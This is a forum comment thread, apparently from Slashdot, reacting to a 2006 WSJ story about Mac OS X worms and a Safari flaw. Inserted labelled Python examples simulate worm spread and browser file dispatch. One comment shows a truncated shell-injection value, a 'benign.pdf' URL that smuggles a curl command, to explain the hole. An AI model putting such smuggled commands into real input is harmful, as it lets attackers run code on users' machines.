Computer 'Worms' Turn on Macs
Carl Bialik from WSJ writes "Macs have been largely immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
Now there's a neutral party with no agenda when it comes to security!
Honestly, the worst Mac malware I've seen so far had a Symantec sticker on the box.
Fleur de Sel
Seriously, if you have to manually download the program and enter your admin password, it is not a virus or a worm. I don't know why people keep calling it that. It is a Trojan, and those have existed since the first rm -rf / script.
The war with islam is a war on the beast
The war on terror is a war for peace
Windows has had what, like 200,000 viruses in the last year? Apple has had two or three theoretical exploits that either require the user to run code by hand or else target services that most Mac users don't turn on. Sounds like Apple is doing its job to me. And honestly this idea that as Apple gets more popular there will be more viruses is largely a load of crap. The notoriety of writing the first real virus for OS X would be vastly more than for writing yet another Windows virus. The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed. I think if people start writing viruses for Apple it will be because Apple gets lazy and stops innovating, or else stops at least trying to fix the bugs in its software. Because right now both the means and the motive are there, but it's just not really happening.
but don't think that running an "obscure" OS makes you safe
*sigh* We don't. We think running an operating system with proper security makes us safe.
"The dew has clearly fallen with a particularly sickening thud this morning"
I guess this will test whether Apple's approach to security (i.e., pretty much like Unix's) is better or worse than Microsoft's.
I.e., will these worms affect the whole computer because of a fault in the operating system, or will they affect only a single user on the computer because of a software issue that let the worm in to play in that user's space, or will it affect people only because of user stupidity ('ooh, really, clicking on this will make my pen0r bigger!')?
Note that Microsoft gets critical security issues fairly often with their approach.
The recent Apple issues have been lowest rated security issues.
Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted.
You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
Folks don't need to worry.
Using google images as a definitive source, I tried the following searches
Microsoft worm
and
apple worm
Surprisingly the Microsoft one was filled with warning messages and exclamation marks and maggots.
Meanwhile the apple one was all cutesy and cartoony and fluffy (some of the worms even appear to be wearing turtlenecks)
The world will continue to turn.
liqbase
Every piece of code is subject to exploits. Show me a program/OS that is 100% infallible and I will show you a liar. I think that the main reason OS/X (and *nix for that matter) was considered to be rock-solid is because very few people were taking shots at it. Now I do realize that *nix-based OSs do plug up the obvious holes that MS left open. But don't assume that just because no one has broken into your house yet that your house is completely secure.
A computer is only as secure as its maintainer. I am running a small network at home that has a mishmash of linux and Windows computers. Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid. The same thing applies with this story - Macs can be exploited because that is the nature of the business. We usually find the holes because some numbnut exploits it.
Just my $0.02
- Andrew
I meta-moderate because I care.
We already know Microsoft's answer, but how does Apple deal with bugs in Mac OS 8 and Mac OS 9? (And does anyone still use Mac OS 7?)
[Fuck Beta]
o0t!
Hopefully very few. With the current state of affairs, anti-virus software for the Mac is a case of the cure being much worse than the disease. Even these recently discovered worms and the Safari vulnerability are relatively benign and can be protected against with a little common sense. In fact, most users hopefully are already safe from the Safari vulnerability since the "Open Safe Files" option was already the source of another vulnerability a while back.
By the time these vulnerabilities make it into the virus definitions, they are old hat. Plus, at least one *cough* Norton *cough* anti-virus for the Mac actually introduces a considerable number of new security vulnerabilities to the OS.
Sure, running anti-virus software on our machines will catch all those old Windows exploits but I'm not compromising my system to protect somebody else who didn't bother taking steps to protect their own machine... sorry.
If/When we start to see a critical mass of malicious viruses, trojans, or other malware targeted at the Mac that aren't stopped by common sense practices, then I'll look into Anti-Virus software... no sooner. Yeah, perhaps there's some risk in doing that, but far less risk than with running anti-virus software right now.
It's never been that (at least for most people). The advantage of Mac OS X is that it is less vulnerable than Windows (making Windows an easier target), and that Apple made decisions in the design process that mean that the typical consequences of a flaw are less severe. In recent years, Microsoft has attempted to harden Windows further and reduce their exposure - in W2K3 Server, for instance, they've done a pretty good job of it.
Even if Apple magically pulls some sort of super OS-jujitsu that reverses their market share and Microsoft's, the basic architecture will stay the same underneath - and that means Apple will have their relative advantages intact for the foreseeable future. Windows is, at its heart, an OS that has traded off many security options for ease of access and ease of programming. Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
There will be viruses that attack Mac OS X. Some will do a pretty good job of attacking. I'm kind of surprised it's taken this long to get there. But I'm also not expecting it ever to compare to Windows in that regard.
-- Josh Turiel
"2. Do not eat iPod Shuffle."
Folks,
The key thing to eyeball here, with all the FUD that has been stirred up, is there are OS vulnerabilities and application vulnerabilities. Much like the annual brouhaha when we compare Linux versus Windows, you must make a clear differentiation.
Like Linux, I would never count, say, an Apache hole against Mac or Linux, since it's an application that is added after a base install. However, unlike Mac or Linux, Windows flaws are very much a hybrid. Windows really doesn't function much as Windows without IE (try reviewing a browser hijack, and see that the file explorer uses the IE render engine, to see that an IE flaw is an OS flaw), and subsequent issues with IE are counted against the OS.
The issues found recently with Bluetooth OBEX and the Safari "open anything" flaw are two examples of differentiators. The OBEX flaw is, yes, a core OS issue; however, it was identified and patched two patches ago (10.4.3), and Apple is no longer shipping the OS in that rev anymore. Minus one to OS security for Apple. However, Safari, an application above the core OS, had a "bad settings default" besides the overall flaw in the app. In short, both are avoidable through an alteration in settings or application of an old patch. To be surprised that the Mac is "insecure" by the press FUD is ridiculous.
Windows, as I sit on Microsoft briefings to my company each month, has not only application security issues on a predictable and regular basis (slow months in the summer and December are due to staff vacations), but because many of those apps are so tied into the core workings of the operating system, each new flaw opens a bigger hole, and they build upon each other. A standard install of XP out of the box takes 38 patches plus the two required just to upgrade to the latest version of Windows Update. WTF?! And that doesn't even cover the OS settings needed to make it "generally" safe to put on the Internet.
I feel safe putting ANY Mac, BSD or Linux box on the net for a half hour while I patch, because, in general, most of the distributions have reasonable defaults set, and, as long as they stay current, it makes them much less appetizing for the latest virus, worm, or hax0r than your default XP install. As it is with big business security, you don't necessarily have to be the most secure, you just have to be less appetizing than the next guy down the row.
I'm truly sick of the news media (print, on-line, and TV) spreading unknowledgeable FUD to the masses, just because it's "something different" without recognizing why it may be different, let alone the overall truths. Remember kids, duck and cover!
From the linked article:
The situation just isn't as simple as you believe it to be. Sure, the number of people who use an operating system tends to have a relation to the number of people who develop for that system and also the number who have the skills necessary to create a virus, trojan, or worm. But there's more to it than that. Windows, although it's getting better, and hopefully Vista will be much better, has architectural issues that make it easier to exploit. It also has consumer-targeted development tools which have the sole intention of lowering the bar to new programmers. Combine these two, and you have a societal petri dish ripe for creating malware authors - not only are there more people using the OS, but there are proportionately more people capable of writing malicious software and a system that is easier to exploit.
If the Mac had 95% market share, there would certainly be more malware, but the situation would simply not be as bad as it is for Windows right now.
Yep, the last exploit relies on people to be morons and try to open an apparent 'picture' from a random spammer, or a strange website/whatever. Which could happen with any OS. Except if the user isn't running with full admin privileges then they are going to be fine anyway..
which is totally what she said
The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed.
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds. More likely, the profit motive isn't there, probably a result of the combination of greater security on OSX and a smaller installed base.
Running anti-virus software is a stupid thing to do when you can FIX the system instead.
What's the phrase? There is no patch for human stupidity?
Go ahead, be smug about it. But the bottom line is that as Mac becomes more popular you're going to have idiots who are going to let things through simply because they don't understand what they're doing. Do you really think that Windows users who keep their systems up to date and use a bit of common sense are the ones you're reading about? Windows is insecure in a lot of aspects, sure, but Windows users with a dose of common sense and some know-how aren't suffering as much as the normal MS-bashing article here would have you think.
Dedicated Cthulhu Cultist since 4523 BC.
Typical 'man bites dog' approach. If it is unusual, it is news. Microsoft Windows is a bug-ridden, insecure OS, but since everyone (or at least 90% of users) uses it, it is not news. No one questions why a defective product exists or what it is actually costing in lost productivity. It is normal in most users' worlds, those users who never have experienced anything else.
OS X exploits are news only because they are unusual (though it does serve as an early warning; I sincerely hope Apple is busy auditing their code base). The fact that they are not as severe as Windows exploits, require more user intervention and are often limited in scope is not discussed or probably understood by most people.
putting the 'B' in LGBTQ+
Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.
.NET does solve buffer overruns (unless you make any calls into Win32 or other C code, which Microsoft makes unnecessarily difficult to do correctly), but it pushes threads even harder. Secure software has to be correct, and threaded correct software is an oxymoron. Now you've got race conditions. The only race condition I usually have to worry about in a typical Unix software package is use of tmpnam() (and every time anyone compiles a piece of software, they get warned about it).
It's not that Linux is secure. It's that Windows is *insecure*.
Microsoft had a long period (perhaps over?) where they introduced *horribly* insecure designs -- making decisions that completely ignored security in the name of any shred of functionality that they might gain. (And those designs still affect us today.) Double-click execution of executables in email, using their full-blown web browser to view emails (which escalated any security hole in a web browser into a worm-class bug), default of no Administrator password on NT, default share all drives (but make them "invisible" to other Windows machines), design a windowing API that essentially makes local security on a computer impossible, have a system where each file has many names (which makes it damned difficult to write a secure server), encourage people to use threads (because their OS lacked copy-on-write), omit the ability to create chroot jails from their OS, run all kinds of servers by default (remember Messenger Service and the spam that you *knew* was going to happen?) allowing IP-based access and then proceed to blame sysadmins for not firewalling Windows boxes because Win machines weren't usable out of box on the Internet, bundle telnet but not ssh, and so forth.
Hmm...other goodies. POSIX places hard bounds on what calls do. Microsoft provides MSDN, which provides some examples and no guarantees. It's a tutorial, not a spec. Writing secure software when you don't have guarantees on *exactly* what a call can do or will do in future revisions of the OS is damned impossible. Because Windows isn't a very usable multi-user machine, software authors essentially ignored local security for years -- most Windows software can be attacked every way to Sunday locally (though I'll grant that this wasn't directly MS's fault). There are local security vulnerabilities in Unix software as well, but people actually *care* about them and fix them if they can find them, and don't just introduce them without a care in the world.
Secure software is correct software, and because Windows tries to guarantee binary compatibility and there is only one Windows, developers don't often look up the spec (when I code serious software under Linux, I have the C99 spec in one window and the POSIX spec in the other). It's just a matter of "well, I've passed in this invalid value and it seems to work, and it'll probably keep going". That drives me nuts. Try saying that on comp.unix.programmer, and you'll discover a higher standard.
And MS is still doing it. Okay,
Now, Microsoft provides lots of security *administration* tools. They provide a sophisticated (I'd even argue overcomplicated -- in the vein of VMS, the problem is not a lack of controls, but in users not understanding the system fully) ACL system. The rules for what exactly happens with permissions when copying files around are bonkers. Sure, most users don't care, but if you're trying to write a system that doesn't have security holes, it's a royal pain in the ass. If it takes a ton of work to figure out and write something properly, developers will just stuff a maximally-permissive ACL on something -- under Unix, you have exactly 12 bits and an owner and group to worry about, and there's the extent of your permission system.
But the problem isn't a lack of frontends and tools. It's the coding and design practices, and that's just ha
Any program relying on (nontrivial) preemptive multithreading will be buggy.
I haven't seen any compelling evidence that Linux or MacOS X are more secure than Windows is against the twin threats of malicious software and badly trained users. They're all based on similar security ideas, which just don't cut the mustard. A better security model does exist, but it's not implemented in any desktop operating system today.
The only supporting argument for this oft-repeated fallacy is that Windows has the biggest market share and the biggest number of security holes.
Far be it from me to shatter your little bubble, but Apache Web Server is more popular than IIS, and has significantly fewer critical exploits.
God, it feels like Karma whoring just pointing out something so bloody obvious.
"The dew has clearly fallen with a particularly sickening thud this morning"
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.
All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.
Imagine two situations. In the first, everyone is using a Windows machine. In the second, half are using Macs and half are using Windows. Everyone has 5 random other machines in its address book (e-mail addresses of the primary user). In the case of a zero-day exploit for Windows, how quickly will the all-Windows cluster become infected?
In the case of the Mac/Windows hybrid cluster, though, the speed significantly decreases and it becomes possible that some machines will never be infected. Why? Each machine sends out 5 e-mails; those that go to Macs will not be exploited. That means, on average, each machine can only infect 2.5 others (rather than 5) and the path to any Windows machine must not intersect only Macs.
In a real world situation, the lack of intersection is the smaller problem (since most people have everyone's e-mail in their address book), but if you're wasting resources sending out suspicious e-mails to Macs, you're mitigating the advantage of the zero-day exploit.
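The thought experiment in the post above (everyone mails five random contacts; Macs are dead ends for a Windows-only worm) can be run as a small simulation. This is an added example, not part of the original comment or of any real worm: the address books are constructed at random with a fixed seed, a Windows host is infected the moment it receives a copy, and a Mac host drops it. The "2.5 effective fan-out" claim and the "some machines never get infected" claim both fall out of the numbers.

```python
import random


def make_books(rng, n_hosts, fanout):
    """Constructed address books: each host knows `fanout` distinct other hosts."""
    books = []
    for i in range(n_hosts):
        picks = [h for h in rng.sample(range(n_hosts), fanout + 1) if h != i]
        books.append(picks[:fanout])
    return books


def simulate_outbreak(n_hosts=2000, mac_fraction=0.0, fanout=5, seed=1):
    """Mass-mailing worm over a random address-book graph.

    Returns a dict with the share of Windows hosts eventually infected, the
    number of mailing rounds the outbreak lasted, and the count of Mac hosts
    that were ever marked infected (always 0: the worm cannot run there).
    """
    rng = random.Random(seed)
    is_mac = [rng.random() < mac_fraction for _ in range(n_hosts)]
    books = make_books(rng, n_hosts, fanout)
    windows_hosts = [h for h in range(n_hosts) if not is_mac[h]]

    infected = set()
    patient_zero = rng.choice(windows_hosts)
    frontier = [patient_zero]
    infected.add(patient_zero)
    rounds = 0
    while frontier:
        rounds += 1
        next_frontier = []
        for host in frontier:
            for target in books[host]:
                if is_mac[target] or target in infected:
                    continue          # dead end (Mac) or already infected
                infected.add(target)
                next_frontier.append(target)
        frontier = next_frontier

    return {
        "windows_infected_share": len(infected) / len(windows_hosts),
        "rounds": rounds,
        "macs_infected": sum(1 for h in infected if is_mac[h]),
    }


def compare(n_hosts=2000, fanout=5, seed=1):
    """All-Windows population versus a 50/50 Mac/Windows population."""
    return {
        "all_windows": simulate_outbreak(n_hosts, 0.0, fanout, seed),
        "half_macs": simulate_outbreak(n_hosts, 0.5, fanout, seed),
    }


if __name__ == "__main__":
    for label, result in compare().items():
        print(label, result)
```

With the all-Windows population almost every host is reached within a handful of rounds; with half the hosts being Macs, the share of Windows hosts reached drops and the outbreak takes more rounds, because every copy mailed to a Mac is a wasted hop.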
Agreed: If you want Mac malware, you have to go to a store and buy it.
It's completely unacceptable that Slashdot editors would post this garbage. From the referenced article:
"In the past two weeks, information-security companies like Symantec Inc., Sophos PLC and McAfee Inc. have identified several security issues related to the latest version of Apple's Mac operating system, called OS X. Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."
Translation: Some public relations drone, with no technical knowledge, paid the Wall Street Journal to post the article. The Wall Street Journal is a "What the rich want you to think" publication, and, in my experience, usually unreliable for anything useful. Note that the article jumps from subject to subject rapidly, apparently to hide the fact that there are no actual incidents of Mac infections to report.
Another translation: Symantec, a maker of very buggy security software of poor design, and other "security" companies want Mac users to buy their products.
Some people, in my opinion, spend their entire working lives being dishonest, trying to trick other people. In my experience some of them work for WSJ.
-
Cheney's company is rapidly building prisons for the U.S. government.
The guy who wrote this article doesn't know what he's talking about. "Worms" spread without any user interaction -- they can infect millions of machines on the internet in hours. Those are the kind of vulnerabilities that got Microsoft in trouble in 2003. Viruses require user interaction to work. All the "vulnerabilities" described in the article require the user to install a program and it's trivially easy to be destructive once you have the user's trust.
In addition, virtually all the vulnerabilities described by the article are local ones -- meaning a malicious person needs access to the machine. Truly dangerous vulnerabilities offer remote access, which means any random hacker on the Internet can control the machine from afar. AFAIK, none have been discovered in most Linux distributions or OS X. If OS X did ship with remote vulnerabilities, THAT would be huge news.
The only relevant part of the article comes at the very end:
Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called "social engineering" techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs. The Anna Kournikova worm from 2001, for example, infamously tricked Windows users into installing it by masquerading as photos of the leggy Russian tennis star attached to e-mails.
Rather than weaknesses in operating systems, such approaches exploit "a bug in peoples' brains, which is much harder to patch," Mr. Cluley says.
That should have been the lead. The rest of the article is idiotic.
The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...
The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time this is fundamentally insecure, and yet the native browsers and third party ones still do it.
This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http :
Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.
What's safe?
Well, there's two options.
1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.
2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.
Here's some options that have been tried and don't work:
1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).
2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).
3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).
So far Apple's tried two of these, let's hope they don't try the third.
* Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
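To make the argument in the comment above concrete, here is an added example (not Safari's code, not Apple's, and not the original poster's) contrasting the two dispatch styles it describes. Policy A is the "safe file types" approach: the browser checks the extension against an allowlist and hands the file to a launcher that honours whatever "open with" binding the file carries, and treats archives as safe, so their contents get dispatched too. Policy B is option 1 from the comment: the browser keeps its own table of viewers keyed by content signature and never consults a general-purpose launcher. The downloads, the magic bytes and the per-file `binding` field are all constructed; in particular, modelling the launcher as "run whatever the file's own metadata names" is an assumption made for illustration.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Download:
    name: str
    data: bytes
    binding: Optional[str] = None               # constructed per-file "open with" metadata
    members: List["Download"] = field(default_factory=list)  # archive contents


# Constructed samples: a real JPEG, a shell script named like a JPEG that
# carries a binding to a terminal, and an archive containing that script.
REAL_JPEG = Download("cat.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)
SCRIPT_AS_JPEG = Download("cat.jpg", b"#!/bin/sh\necho owned\n", binding="Terminal")
ARCHIVE = Download("photos.zip", b"PK\x03\x04", members=[SCRIPT_AS_JPEG])

SAFE_EXTENSIONS = {".jpg", ".pdf", ".zip"}     # Policy A allowlist (archives counted as safe)
DEFAULT_APP_BY_EXT = {".jpg": "Preview", ".pdf": "Preview", ".zip": "Archive Utility"}


def ext(name: str) -> str:
    return name[name.rfind("."):].lower() if "." in name else ""


def launcher_open(d: Download) -> List[str]:
    """Model of a desktop launcher: honours the file's own binding if it has one."""
    app = d.binding or DEFAULT_APP_BY_EXT.get(ext(d.name))
    if app == "Terminal":
        return ["EXECUTED " + d.name]           # untrusted bytes run as a script
    if app == "Archive Utility":
        actions = ["UNPACKED " + d.name]
        for member in d.members:
            actions += open_via_launcher(member)  # unpacked files re-enter the browser's check
        return actions
    return ["VIEWED %s with %s" % (d.name, app)]


def open_via_launcher(d: Download) -> List[str]:
    """Policy A: extension allowlist, then hand off to the general launcher."""
    if ext(d.name) in SAFE_EXTENSIONS:
        return launcher_open(d)
    return ["SAVED %s (not auto-opened)" % d.name]


# Policy B: the browser's own viewer table, keyed by content signature, and the
# extension must agree with the signature. Nothing else is ever auto-opened.
MAGIC_VIEWERS = {
    b"\xff\xd8\xff": ("Preview", ".jpg"),
    b"%PDF-": ("Preview", ".pdf"),
}


def open_via_own_table(d: Download) -> List[str]:
    for magic, (app, expected_ext) in MAGIC_VIEWERS.items():
        if d.data.startswith(magic) and ext(d.name) == expected_ext:
            return ["VIEWED %s with %s" % (d.name, app)]
    return ["SAVED %s (not auto-opened)" % d.name]


if __name__ == "__main__":
    for sample in (REAL_JPEG, SCRIPT_AS_JPEG, ARCHIVE):
        print("A:", open_via_launcher(sample), " B:", open_via_own_table(sample))
```

Under Policy A the disguised script is executed, directly or after being unpacked from the "safe" archive, because the extension check says nothing about what the launcher will do with the file. Under Policy B the same file is merely saved: the browser only ever calls viewers it chose itself, on content it verified.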
Totally irrelevant to what I had posted. Also, again, they already know that their new code is also going to be just as subject to viruses as their old code was - that's why they're including an anti-virus. Microsoft can't make a reasonably secure operating system. Its not part of their culture, nor part of their technical capabilities.
Vista is going to be holier than swiss cheese, and Microsoft already knows it. Thats why they're working so hard to make the patching process easier - its going to be needed just as much. Ditto for including an anti-virus. Because they can't fix the underlying code. It was crap in 1982. Its still crap today.
Windows is so far ahead in the malware world, there is no way that any other system will ever catch up to the hundreds of thousands of viruses, worms and trojans that are essential to the full Windows experience.
Oh well, what the hell...
Symantec speaking badly of Macs should work for them both ways. Prevent people from switching away from the arch they sell most product for AND frighten Mac users into buying their crap.
They will only be able to demonize Macs for so long, until people realise that they are harder to exploit on a large scale because they come with less insane defaults.
BTW, if you really REALLY want to fuck up your Mac install... install some Symantec products. A serious downgrade.
War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?